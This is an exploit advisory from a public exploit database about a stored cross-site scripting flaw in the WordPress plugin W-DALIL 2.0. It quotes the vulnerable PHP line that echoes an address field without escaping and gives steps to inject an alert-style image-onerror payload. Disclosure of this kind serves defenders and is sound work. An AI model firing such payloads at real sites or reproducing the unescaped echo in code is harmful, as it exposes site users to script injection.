Exploit for WordPress W-DALIL 2.0 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:167595
# Exploit Title: WordPress Plugin W-DALIL - Stored Cross Site Scripting  
# Date: 27-06-2022  
# Exploit Author: Mariam Tariq - HunterSherlock  
# Vendor Homepage: https://wordpress.org/plugins/w-dalil/  
# Version: 2.0  
# Tested on: Firefox  
# Contact me: mariamtariq404@gmail.com  
  
#Vulnerable Code:  
  
```  
<input class="dalil_input" name="dalil-address" type="text"  
placeholder="<?php echo __('Dalil item address','w-dalil'); ?>"  
value="<?php echo $dalil_information['dalil-address']; ?>" />  
  
```  
  
#Steps To Reproduce :  
  
1 - First Install the plugin "*w-dalil*" and activate it.  
2 - Go to Dalil —> Add New Dalil item  
3 - Inside the “*Dalil item address*” enter XSS payload “*><img src=x  
onerror=alert(1)>*" and hit enter.  
  
#Poc Image :  
  
https://imgur.com/JPG97oh